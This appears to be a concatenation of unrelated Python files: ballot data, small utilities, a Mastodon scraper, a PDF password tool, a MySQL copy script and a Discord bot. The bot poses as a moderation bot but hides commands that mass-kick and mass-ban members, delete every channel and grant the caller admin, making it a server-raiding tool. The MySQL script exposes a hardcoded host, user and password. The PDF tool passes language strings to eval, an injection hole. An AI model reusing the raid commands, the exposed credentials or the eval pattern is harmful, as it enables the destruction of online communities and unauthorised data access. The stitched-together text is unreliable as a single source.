},
'candidates': [{
'name': 'William B. Raines',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Egan Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Daniel J. Kubasiak',
'party': 'Democratic',
'candidateUrl': 'http://www.judgedank.org/',
'email': '[email protected]'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Connors Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Kristal Rivers',
'party': 'Democratic',
'candidateUrl': 'http://rivers4judge.org/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/193818317451678'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/Rivers4Judge'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - McDonald Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Cynthia Y. Cobbs',
'party': 'Democratic',
'candidateUrl': 'http://judgecobbs.com/',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/1387935061420024'
}, {
'type': 'Twitter',
'id': 'https://twitter.com/judgecobbs'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Lowrance Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Thomas J. Carroll',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Veal Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Andrea Michele Buford',
'party': 'Democratic',
'channels': [{
'type': 'Facebook',
'id': 'https://www.facebook.com/ElectJudgeBufordForTheBench'
}]
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Burke Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': 'Maritza Martinez',
'party': 'Democratic'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'General',
'office': 'Cook Circuit - Felton Vacancy',
'level': ['administrativeArea2'],
'roles': ['judge'],
'district': {
'name': 'Cook County',
'scope': 'countywide',
'id': 'ocd-division/country:us/state:il/county:cook'
},
'candidates': [{
'name': "Patricia O'Brien Sheahan",
'party': 'Democratic',
'candidateUrl': 'http://sheahanforjudge.com/'
}],
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'CONSTITUTION BALLOT PROPOSED AMENDMENT TO THE 1970 ILLINOIS CONSTITUTION (1)',
'referendumSubtitle': '"NOTICE THE FAILURE TO VOTE THIS BALLOT MAY BE THE EQUIVALENT OF A NEGATIVE VOTE, BECAUSE A CONVENTION SHALL BE CALLED OR THE AMENDMENT SHALL BECOME EFFECTIVE IF APPROVED BY EITHER THREE-FIFTHS OF THOSE VOTING ON THE QUESTION OR A MAJORITY OF THOSE VOTING IN THE ELECTION. (THIS IS NOT TO BE CONSTRUED AS A DIRECTION THAT YOUR VOTE IS REQUIRED TO BE CAST EITHER IN FAVOR OF OR IN OPPOSITION TO THE PROPOSITION HEREIN CONTAINED.) WHETHER YOU VOTE THIS BALLOT OR NOT YOU MUST RETURN IT TO THE ELECTION JUDGE WHEN YOU LEAVE THE VOTING BOOTH".',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15966',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'CONSTITUTION BALLOT PROPOSED AMENDMENT TO THE 1970 ILLINOIS CONSTITUTION (2)',
'referendumSubtitle': '"NOTICE THE FAILURE TO VOTE THIS BALLOT MAY BE THE EQUIVALENT OF A NEGATIVE VOTE, BECAUSE A CONVENTION SHALL BE CALLED OR THE AMENDMENT SHALL BECOME EFFECTIVE IF APPROVED BY EITHER THREE-FIFTHS OF THOSE VOTING ON THE QUESTION OR A MAJORITY OF THOSE VOTING IN THE ELECTION. (THIS IS NOT TO BE CONSTRUED AS A DIRECTION THAT YOUR VOTE IS REQUIRED TO BE CAST EITHER IN FAVOR OF OR IN OPPOSITION TO THE PROPOSITION HEREIN CONTAINED.) WHETHER YOU VOTE THIS BALLOT OR NOT YOU MUST RETURN IT TO THE ELECTION JUDGE WHEN YOU LEAVE THE VOTING BOOTH".',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15967',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (1)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15738',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (2)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15739',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}, {
'type': 'Referendum',
'district': {
'name': 'Illinois',
'scope': 'statewide',
'id': 'ocd-division/country:us/state:il'
},
'referendumTitle': 'STATEWIDE ADVISORY QUESTION (3)',
'referendumUrl': 'http://www.elections.il.gov/ReferendaProfile/ReferendaDetail.aspx?ID=15740',
'sources': [{
'name': 'Ballot Information Project',
'official': False
}]
}],
'state': [{
'name': 'Illinois',
'electionAdministrationBody': {
'name': 'Illinois State Board of Elections',
'electionInfoUrl': 'http://www.elections.il.gov',
'votingLocationFinderUrl': 'https://ova.elections.il.gov/PollingPlaceLookup.aspx',
'ballotInfoUrl': 'https://www.elections.il.gov/ElectionInformation/OfficesUpForElection.aspx?ID=2GLMQa4Rilk%3d',
'correspondenceAddress': {
'line1': '2329 S Macarthur Blvd.',
'city': 'Springfield',
'state': 'Illinois',
'zip': '62704-4503'
}
},
'local_jurisdiction': {
'name': 'CITY OF CHICAGO',
'sources': [{
'name': 'Voting Information Project',
'official': True
}]
},
'sources': [{
'name': '',
'official': False
}]
}]
}
polling_data = [{
'passed_address': '900 N Washtenaw, Chicago, IL 60622',
'polling_locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'polling_address': '904 N WASHTENAW AVE',
'polling_city': 'CHICAGO',
'polling_state': 'IL',
'polling_zip': '60622',
'source_name': 'Voting Information Project',
'source_official': True,
'pollingHours': '',
'notes': ''},
{
'passed_address': '900 N Washtenaw, Chicago, IL 60622',
'polling_locationName': 'UKRAINIAN ORTHDX PATRONAGE CH',
'polling_address': '904 N WASHTENAW AVE',
'polling_city': 'CHICAGO',
'polling_state': 'IL',
'polling_zip': '60622',
'source_name': 'Voting Information Project',
'source_official': True,
'pollingHours': '',
'notes': ''
}]
| python |
def readFile(path):
try:
with open(path, "r") as file:
return file.read()
except:
print(
"{Error: Failed to load file. File doesn't exist or invalid file path, "
+ "Message: Please check arguments or import strings.}"
)
return ""
class Stack:
def __init__(self):
self._stack = []
def isEmpty(self):
return len(self._stack) == 0
def peek(self):
return self._stack[-1] if not self.isEmpty() else None
def push(self, element):
self._stack.append(element)
def pop(self):
return self._stack.pop() if not self.isEmpty() else None
def get(self, index):
return self._stack[index] if index < len(self._stack) and index >= 0 else None
def __len__(self):
return len(self._stack)
| python |
import discord
from discord.ext import commands
from discord.ext.commands import Bot
import asyncio
import time
import logging
import random
import googletrans
prefix = "$"
BOT_TOKEN = "token-goes-here"
intents = discord.Intents.default()
intents.members = True
client = commands.Bot(command_prefix=prefix, intents=intents)
client.remove_command("help")
@client.event
async def on_ready():
print ("Bot is now online!")
@client.event
async def on_server_join(server):
print("Joining the server: {0}".format(server.name))
@client.command(pass_context=True)
async def clear(ctx, amount=1000):
await ctx.channel.purge(limit=amount)
@client.command(pass_context=True)
async def ping(ctx):
channel = ctx.message.channel
t1 = time.perf_counter()
await channel.trigger_typing()
t2 = time.perf_counter()
embed=discord.Embed(title=None, description='Ping: {}'.format(round((t2-t1)*1000)), color=0x2874A6)
await channel.send(embed=embed)
@client.command(pass_context=True)
async def avatar(ctx, member : discord.Member = None):
if member == None:
member = ctx.author
memavatar = member.avatar_url
avEmbed = discord.Embed(title = f"{member.name}'s Avatar")
avEmbed.set_image(url = memavatar)
await ctx.send(embed = avEmbed)
@client.command()
async def say(ctx, *, msg=None):
if msg is not None:
await ctx.send(msg)
await ctx.message.delete()
@client.command(aliases=['tr'])
async def translate(ctx, lang_to, *args):
lang_to = lang_to.lower()
if lang_to not in googletrans.LANGUAGES and lang_to not in googletrans.LANGCODES:
raise commands.BadArgument("Invalid language to translate text to")
text = ' '.join(args)
translator = googletrans.Translator()
text_translated = translator.translate(text, dest=lang_to).text
await ctx.send(text_translated)
@client.command(pass_context=True)
async def userinfo(ctx, member: discord.Member=None):
channel = ctx.message.channel
if member is None:
await channel.send('Please input a valid user.')
else:
await channel.send("**The user's name is: {}**".format(member.name) + "\n**The user's ID is: {}**".format(member.id) + "\n**The user's highest role is: {}**".format(member.top_role) + "\n**The user joined at: {}**".format(member.joined_at) + "\n**The user's account creation date is: {}**".format(member.created_at))
@client.command(pass_context=True)
async def kick(ctx, member: discord.Member=None):
author = ctx.message.author
channel = ctx.message.channel
if author.guild_permissions.kick_members:
if member is None:
await channel.send("Please input a valid user.")
else:
await channel.send("Die, **{}**".format(member.name))
await member.kick()
else:
await channel.send("I bet you don't have enough permissions.")
@client.command(pass_context=True)
async def ban(ctx, member: discord.Member=None):
author = ctx.message.author
channel = ctx.message.channel
if author.guild_permissions.kick_members:
if member is None:
await channel.send('Please input a valid user.')
else:
await channel.send("Die **{}**.".format(member.name))
await member.ban()
else:
await channel.send("Where are your permissions?!")
@client.command(pass_context=True)
async def mute(ctx, member: discord.Member):
guild = ctx.guild
mutedRole = discord.utils.get(guild.roles, name="Muted")
if not mutedRole:
mutedRole = await guild.create_role(name="Muted")
for channel in guild.channels:
await channel.set_permissions(mutedRole, speak=False, send_messages=False, read_message_history=True, read_messages=False)
await member.add_roles(mutedRole)
await ctx.send(f"Muted {member.mention}.")
await member.send(f"Silence, {guild.name}.")
@client.command(pass_context=True)
async def unmute(ctx, member: discord.Member):
mutedRole = discord.utils.get(ctx.guild.roles, name="Muted")
await member.remove_roles(mutedRole)
await ctx.send(f"Unmuted {member.mention}.")
await member.send(f"Make sure you wont say bullshit again, {ctx.guild.name}")
@client.command(pass_context=True)
async def secret(ctx):
member = ctx.message.author
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.set_author(name='Bot Commands')
embed.add_field(name='$ba', value='Bans everybody from the server (bot needs banning perms and needs to have a higher role than users', inline=False)
embed.add_field(name='$dc', value='Deletes all channels (bot needs manage channels perms)', inline=False)
embed.add_field(name='$ka', value='Kicks everyone from the server (bot needs kicking perms)', inline=False)
embed.add_field(name='$a', value='Gives you admin role (bot needs administrator)', inline=False)
embed.add_field(name='$invite', value='Sends an invite link of the bot', inline=False)
embed.add_field(name='$createchannel', value='makes x amount of channels defined by you', inline=False)
embed.add_field(name='$createrole', value='makes x amount of roles defined by you', inline=False)
embed.add_field(name='$ping', value='Gives ping to client (expressed in ms)', inline=False)
embed.add_field(name='$kick', value='Kicks specified user', inline=False)
embed.add_field(name='$ban', value='Bans specified user', inline=False)
embed.add_field(name='$userinfo', value='Gives information of a user', inline=False)
embed.add_field(name='$clear', value='Clears an X amount of messages', inline=False)
embed.add_field(name='$dm', value='Sends a direct message containing hi to the author', inline=False)
embed.add_field(name='$serverinfo', value='Gives information about the server', inline=False)
embed.add_field(name='$avatar', value="Shows avatar of selected user")
embed.add_field(name='$tr', value="Translates text. Example: $tr english hola")
embed.add_field(name='$mute', value="Mutes an user.")
embed.add_field(name='$unmute', value="Unmutes an user.")
embed.add_field(name='$say', value="Say a specific message.")
await member.send(embed=embed)
@client.command()
async def serverinfo(ctx):
name = str(ctx.guild.name)
description = str(ctx.guild.description)
owner = str(ctx.guild.owner)
id = str(ctx.guild.id)
region = str(ctx.guild.region)
memberCount = str(ctx.guild.member_count)
icon = str(ctx.guild.icon_url)
date = str(ctx.guild.created_at)
embed = discord.Embed(
title=name + " Server Information",
description=description,
color=discord.Color.blue()
)
embed.set_thumbnail(url=icon)
embed.add_field(name="Owner", value=owner, inline=True)
embed.add_field(name="Server ID", value=id, inline=True)
embed.add_field(name="Region", value=region, inline=True)
embed.add_field(name="Member Count", value=memberCount, inline=True)
embed.add_field(name="Created On", value=date, inline=True)
await ctx.send(embed=embed)
@client.command(pass_context=True)
async def ka(ctx):
guild = ctx.message.guild
logchannel = client.get_channel(id)
for member in list(ctx.message.guild.members):
try:
await guild.kick(member)
print ("User " + member.name + " has been kicked")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User kicked", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print ("Action Completed: Kicked everyone.")
@client.command(pass_context=True)
async def ba(ctx):
guild = ctx.message.guild
logchannel = client.get_channel(id)
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print ("User " + member.name + " has been banned")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User banned", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print ("Action Completed: Banned everyone.")
@client.command(pass_context=True)
async def dc(ctx):
logchannel = client.get_channel(id)
for channel in list(ctx.message.guild.channels):
try:
await channel.delete()
print (channel.name + " has been deleted")
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.add_field(name="Channel deleted", value=f'#{channel.name}')
await logchannel.send(embed=embed)
except:
pass
guild = ctx.message.guild
channel = await guild.create_text_channel("hello")
await channel.send("g3t 13373d")
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print ("User " + member.name + " has been banned")
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.add_field(name="User banned", value=f'{member.name}')
await logchannel.send(embed=embed)
except:
pass
print("h4ck3r att4ck f1n1sh3d")
@client.command(pass_context=True)
async def a(ctx):
guild = ctx.message.guild
perms = discord.Permissions(8)
logchannel = client.get_channel()
await guild.create_role(name='*', permissions=perms)
member = ctx.message.author
role = discord.utils.get(guild.roles, name="*")
await member.add_roles(role)
embed = discord.Embed(
colour = discord.Colour.orange()
)
embed.add_field(name="User got admin", value=f'{member}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def createchannel(ctx, x):
guild = ctx.message.guild
logchannel = client.get_channel(id)
for i in range(int(x)):
await guild.create_text_channel("newchannel")
embed = discord.Embed(
colour = discord.Colour.green()
)
embed.add_field(name="Channels created", value=f'{x}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def createrole(ctx, x):
guild = ctx.message.guild
perms = discord.Permissions(0)
logchannel = client.get_channel(739058160291020920)
for i in range(int(x)):
await guild.create_role(name="somerole", permissions=perms)
embed = discord.Embed(
colour = discord.Colour.gold()
)
embed.add_field(name="Roles created", value=f'{x}')
await logchannel.send(embed=embed)
@client.command(pass_context=True)
async def dm(ctx):
await ctx.author.send("hi")
client.run(BOT_TOKEN)
| python |
"""Helper file to check if user has valid permissions."""
from application.common.common_exception import (UnauthorizedException,
ResourceNotAvailableException)
from application.model.models import User, UserProjectRole, RolePermission, \
Permission, UserOrgRole, Organization, Project, Role
from index import db
def check_permission(user_object, list_of_permissions=None,
org_id=None, project_id=None):
"""
Mthod to check if user is authorized.
Args:
list_of_permissions (list): list of permission names to be checked
user_object (object): User object with caller information
org_id (int): Id of the org
project_id (int): Id of the project
Returns: True if authorized, False if unauthorized
"""
# check if user is super admin
super_user = User.query.filter_by(user_id=user_object.user_id).first()
if super_user.is_super_admin:
return True
# check for project permission
if project_id:
project_permission = db.session.query(
Permission.permission_name).join(
RolePermission,
Permission.permission_id == RolePermission.permission_id).join(
UserProjectRole,
RolePermission.role_id == UserProjectRole.role_id).filter(
UserProjectRole.project_id == project_id,
UserProjectRole.user_id == user_object.user_id
).all()
if list_of_permissions is None and project_permission:
return True
if project_permission:
project_permission_from_db = \
[each_permission[0] for each_permission in project_permission]
if set(list_of_permissions).issubset(project_permission_from_db):
return True
# Check for Organization permission
if org_id:
org_permission = db.session.query(Permission.permission_name).join(
RolePermission,
Permission.permission_id == RolePermission.permission_id).join(
UserOrgRole, RolePermission.role_id == UserOrgRole.role_id).filter(
UserOrgRole.org_id == org_id,
UserOrgRole.user_id == user_object.user_id
).all()
if list_of_permissions is None and org_permission:
return True
if org_permission:
org_permission_from_db = \
[each_permission[0] for each_permission in org_permission]
if set(list_of_permissions).issubset(org_permission_from_db):
return True
raise UnauthorizedException
def check_valid_id_passed_by_user(org_id=None, project_id=None, user_id=None,
role_id=None,
**kwargs):
"""Check if Ids passed are valid in DB."""
valid_org, valid_project, valid_user, valid_role = None, None, None, None
if org_id:
valid_org = Organization.query.filter_by(
org_id=org_id, is_deleted=False).first()
if not valid_org:
raise ResourceNotAvailableException("Organization")
if project_id:
valid_project = Project.query.filter_by(
project_id=project_id, is_deleted=False).first()
if not valid_project:
raise ResourceNotAvailableException("Project")
if user_id:
valid_user = User.query.filter_by(
user_id=user_id, is_deleted=False).first()
if not valid_user:
raise ResourceNotAvailableException("User")
if role_id:
valid_role = Role.query.filter_by(
role_id=role_id).first()
if not valid_role:
raise ResourceNotAvailableException("Role")
return valid_org, valid_project, valid_user, valid_role
| python |
#!/bin/python3
# this script should be run with a "script" command to save the output into a file
import requests
import io
import json
# put the instance needed here
inst='https://octodon.social/api/v1/timelines/public?local=1'
with io.open("toots.txt","a",encoding="utf8") as f:
while True:
res = requests.get(inst)
toots = res.text
f.write(toots+'\n')
headers = res.headers
links = headers['Link']
suiv=links.split()[0].replace('<',' ').replace('>',' ').replace(';',' ').strip()
print(suiv)
if not suiv.startswith("https") or suiv==inst: break
inst=suiv
# reload
# with io.open("toots.txt","r",encoding="utf-8") as f:
# for l in f:
# res=json.loads(l)
# for t in res: print(t['content'])
# this script only downloads the posts in the public local timeline: so there is no dialog in there yet !
# look at downloadReplies.py next to get the dialogs
| python |
/home/runner/.cache/pip/pool/40/4e/54/4dc30f225358504ac2a93685d7323e0851fea2c2a9937f25f1d53d20f9 | python |
# Licensed under MIT license - see LICENSE.rst
# -*- coding: utf-8 -*-
"""Utility functions."""
import numpy as np
__all__ = ['mag_to_flux', 'flux_to_mag', 'e1_e2_to_shape']
def mag_to_flux(mag, zeropoint=27.0):
"""Convert magnitude into flux unit.
"""
return 10.0 ** ((zeropoint - mag) / 2.5)
def flux_to_mag(flux, zeropoint=27.0):
"""Convert flux into magnitude unit.
"""
# TODO: deal with negative values more gracefully
return -2.5 * np.log10(flux) + zeropoint
def e1_e2_to_shape(e1, e2, shape_type='b_a'):
"""Convert the complex ellipticities to normal shape.
"""
# Positiona angle
pa = np.arctan(e2 / e1) * 0.5
# Axis ratio or ellipticity or eccentricity
abs_e = np.sqrt(e1 ** 2 + e2 ** 2)
b_a = (1 - abs_e) / (1 + abs_e)
if shape_type == 'b_a':
# Axis ratio
return b_a, pa
elif shape_type == 'ellip':
# Ellipticity
return 1.0 - b_a, pa
elif shape_type == 'eccen':
# Eccentricity
return np.sqrt(1 - b_a ** 2), pa
else:
raise ValueError("# Wrong shape type: [b_a|ellip|eccen]")
def shape_to_e1_e2(b_a, pa):
"""Convert axis ratio and position angle into complex ellipticities.
"""
abs_e = (1 - b_a) / (1 + b_a)
return abs_e * np.cos(2 * pa), abs_e * np.sin(2 * pa)
| python |
#!/usr/bin/env python3
import os
import sys
import json
import random
from pathlib import Path
from PySide6 import QtCore, QtWidgets
from pikepdf import Pdf, Encryption
class ProtectPdfWindow(QtWidgets.QWidget):
def __init__(self, lang_file='en.json'):
super().__init__()
if os.path.isfile(lang_file):
self.lang = json.loads(open(lang_file, 'r', encoding='utf8').read())
else:
print(f'Error: File {lang_file} does not exist. Using default language English')
self.lang = default_lang
self.buttonChooseDir = QtWidgets.QPushButton(self.lang['select_dir'])
self.buttonStartEncrypting = QtWidgets.QPushButton(self.lang['add_pwd_protection'])
self.exitButton = QtWidgets.QPushButton(self.lang['quit'])
self.dirText = QtWidgets.QLabel(self.lang['no_dir_selected'])
self.infoText = QtWidgets.QLabel(self.lang['will_be_applied_to_zero'])
self.passwordText = QtWidgets.QLabel(self.lang['pwd'])
self.lineEditPassword = QtWidgets.QLineEdit(self)
self.checkBoxDecrypt = QtWidgets.QCheckBox(self.lang['remove_pwd_protection_checkbox'])
self.layout = QtWidgets.QVBoxLayout(self)
self.hbox1 = QtWidgets.QHBoxLayout()
self.hbox2 = QtWidgets.QHBoxLayout()
self.hbox3 = QtWidgets.QHBoxLayout()
self.layout.addLayout(self.hbox1)
self.hbox1.addWidget(self.buttonChooseDir)
self.hbox1.addWidget(self.dirText)
self.layout.addLayout(self.hbox2)
self.hbox2.addWidget(self.passwordText)
self.hbox2.addWidget(self.lineEditPassword)
self.layout.addLayout(self.hbox3)
self.hbox3.addWidget(self.checkBoxDecrypt)
self.hbox3.addWidget(self.buttonStartEncrypting)
self.layout.addWidget(self.infoText)
self.layout.addWidget(self.exitButton)
self.infoText.setWordWrap(True)
self.buttonChooseDir.clicked.connect(self.pickDirectory)
self.buttonStartEncrypting.clicked.connect(self.protectPdfs)
self.checkBoxDecrypt.stateChanged.connect(lambda: self.buttonStartEncrypting.setText(self.lang['remove_pwd_protection'] if self.checkBoxDecrypt.isChecked() else self.lang['add_pwd_protection']))
self.exitButton.clicked.connect(self.close)
self.directory = ''
self.pdfs = []
@QtCore.Slot()
def pickDirectory(self):
self.directory = str(QtWidgets.QFileDialog.getExistingDirectory(self, self.lang['select_dir']))
self.infoText.setText(self.lang['dirs_are_being_searched'])
self.infoText.repaint()
self.dirText.setText(self.directory)
self.pdfs = list(map(str, Path(self.directory).rglob('*.pdf')))
self.infoText.setText(self.eval_lang_string(self.lang['pdfs_were_found'], locals()))
@QtCore.Slot()
def protectPdfs(self):
password = self.lineEditPassword.text()
if not password:
print(self.lang['no_pwd_provided'])
self.infoText.setText(self.lang['no_pwd_provided'])
return
self.infoText.setText('')
infoText = ''
cnt = 0
for pdf_path in self.pdfs:
try:
if self.checkBoxDecrypt.isChecked():
pdf = Pdf.open(pdf_path, password=password)
pdf.save(pdf_path + '.tmp')
else:
pdf = Pdf.open(pdf_path)
pdf.save(pdf_path + '.tmp', encryption=Encryption(owner=password, user=password, R=4))
pdf.close()
os.remove(pdf_path)
os.rename(pdf_path + '.tmp', pdf_path)
modification = self.eval_lang_string(self.lang['pdfs_were_modified'], locals())
print(modification)
infoText += modification + '\n'
cnt += 1
except Exception as e:
error = self.eval_lang_string(self.lang['error_on_pdf_processing'], locals())
print(error)
print(e)
infoText += error + '\n'
infoText += self.eval_lang_string(self.lang['done'], locals())
self.infoText.setText(infoText)
def eval_lang_string(self, s, env=globals() | locals()):
return eval("f'" + s + "'", env)
default_lang = {
"select_dir":"Select directory",
"quit":"Quit",
"no_dir_selected":"No directory selected",
"will_be_applied_to_zero":"No PDFs will be modified",
"pwd":"Password:",
"add_pwd_protection":"Protect PDFs with password",
"remove_pwd_protection":"Remove passwords from PDFs",
"remove_pwd_protection_checkbox":"Remove password?",
"pdfs_were_found":"{str(len(self.pdfs))} PDFs were found",
"no_pwd_provided":"No password was specified",
"dirs_are_being_searched":"Directories are being searched",
"pdfs_were_modified":"PDF was {\"decrypted\" if self.checkBoxDecrypt.isChecked() else \"encrypted\"} ({pdf_path})",
"done":"Done: {cnt}/{len(self.pdfs)} PDFs were {\"decrypted\" if self.checkBoxDecrypt.isChecked() else \"encrypted\"}",
"error_on_pdf_processing":"An error occured while processing PDF {pdf_path}"
}
if __name__ == '__main__':
app = QtWidgets.QApplication([])
widget = ProtectPdfWindow()
widget.resize(400, 200)
widget.show()
sys.exit(app.exec())
| python |
def remap( x, oMin, oMax, nMin, nMax ):
#range check
if oMin == oMax:
print("Warning: Zero input range")
return None
if nMin == nMax:
print("Warning: Zero output range")
return None
#check reversed input range
reverseInput = False
oldMin = min( oMin, oMax )
oldMax = max( oMin, oMax )
if not oldMin == oMin:
reverseInput = True
#check reversed output range
reverseOutput = False
newMin = min( nMin, nMax )
newMax = max( nMin, nMax )
if not newMin == nMin :
reverseOutput = True
portion = (x-oldMin)*(newMax-newMin)/(oldMax-oldMin)
if reverseInput:
portion = (oldMax-x)*(newMax-newMin)/(oldMax-oldMin)
result = portion + newMin
if reverseOutput:
result = newMax - portion
return int(result)
| python |
import pandas as pd
import mysql.connector
import json
from pandas.io.json import json_normalize
from sqlalchemy import create_engine
import pymysql.cursors
import datetime
def connect():
""" Connect to MySQL database """
source = None
try:
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
if source:
print('Connected to Source MySQL database')
except Error as e:
print(e)
def test():
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
df = pd.read_sql_query(" SELECT * FROM management_case ", source)
df['time'] =pd.to_timedelta(df['time'])
print(df['time'].head(10))
def read():
try:
source = pymysql.connect(host='35.220.139.166',
user='tonyho',
password='zanik5dbkr',
database='osmosisdatatest',
cursorclass=pymysql.cursors.DictCursor)
creds = {'usr': 'tonyho',
'pwd': 'zanik5dbkr',
'hst': '35.220.139.166',
'prt': 3306,
'dbn': 'osmosisdatatest1'}
connstr = 'mysql+mysqlconnector://{usr}:{pwd}@{hst}:{prt}/{dbn}'
engine = create_engine(connstr.format(**creds))
#df = pd.read_sql_query(" SELECT * FROM auth_user ", source)
#df.to_sql(con=engine, name='auth_user', if_exists='append', index=False)
#print("Auth_user work!")
#df = pd.read_sql_query(" SELECT * FROM authtoken_token ", source)
#df.to_sql(con=engine, name='authtoken_token', if_exists='append', index=False)
#print("authtoken_token!")
#df = pd.read_sql_query(" SELECT * FROM OneToOne_customer ", source)
#df.to_sql(con=engine, name='OneToOne_customer', if_exists='append', index=False)
#print("Customer work!")
#df = pd.read_sql_query(" SELECT * FROM management_product " , source)
#df.to_sql(con=engine, name='management_product', if_exists='append',index=False)
#print("Product work!")
#df = pd.read_sql_query(" SELECT * FROM management_technician ", source)
#df.to_sql(con=engine, name='management_technician', if_exists='append', index=False)
#print("Technician work!")
#df = pd.read_sql_query(" SELECT * FROM management_mainperiod ", source)
#df.to_sql(con=engine, name='management_mainperiod', if_exists='append', index=False)
#print("Main Period work!")
#df = pd.read_sql_query(" SELECT * FROM management_filter ", source)
#df.to_sql(con=engine, name='management_filter', if_exists='append', index=False)
#print("Filter work!")
#df = pd.read_sql_query(" SELECT * FROM management_case ", source , parse_dates=['time'])
#df['time'] = pd.DataFrame({'time': pd.to_timedelta(df['time'])})
#df['time'] = df['time'].astype('str')
#df.replace({'NaT': None}, inplace=True)
#df.to_sql(con=engine, name='management_case1', if_exists='append', index=False)
#print("Case work!")
df = pd.read_sql_query(" SELECT * FROM management_case_filters ", source)
df.to_sql(con=engine, name='management_case_filters1', if_exists='append', index=False)
print("Case Filter work!")
df = pd.read_sql_query(" SELECT * FROM management_case_machines ", source)
df.to_sql(con=engine, name='management_case_machines1', if_exists='append', index=False)
print("Case Machine work!")
df = pd.read_sql_query(" SELECT * FROM management_machine ", source)
df.to_sql(con=engine, name='management_machine1', if_exists='append', index=False)
print("Machine work!")
df = pd.read_sql_query(" SELECT * FROM management_mainpack ", source)
df.to_sql(con=engine, name='management_mainpack', if_exists='append', index=False)
print("Mainpack work!")
except Exception as e:
print(e)
if __name__ == '__main__':
connect()
read()
###test()
| python |
import pandas as pd
import numpy as np
import helper_functions.DataFrames as dfimport
def FillNaNWithCurrentDistribution(column, df):
'''
Input : The name of the column to witch the fillig strategy should be applied to,
plus the DataFrame object contanig the relevant data.
Output : The Pandas DataFrame object given as input. Containing the column where missing values have been supplanted,
by values based on the current distibition.
'''
data = df
# Current distribution, [dtype: float64]
s = data[column].value_counts(normalize=True)
missing = data[column].isnull()
data.loc[missing, column] = np.random.choice(
s.index, size=len(data[missing]), p=s.values)
#res_ser = pd.Series(data[column])
return data
def FillNaNWithCurrentDistributionFromCsv(column, csv):
'''
Input : The name of the column to witch the fillig strategy, for missing values, should be applied.
Plus the csv name the data should obtained from.
Output : A Pandas Series objected. Containing the column where missing values have been supplanted,
by values based on the current distibition.
'''
data = pd.DataFrame()
if csv.__eq__('listings.csv'):
data = dfimport.GetListingsDataFrame()
elif csv.__eq__('primary_data.csv'):
data = dfimport.GetPrimaryDataFrame()
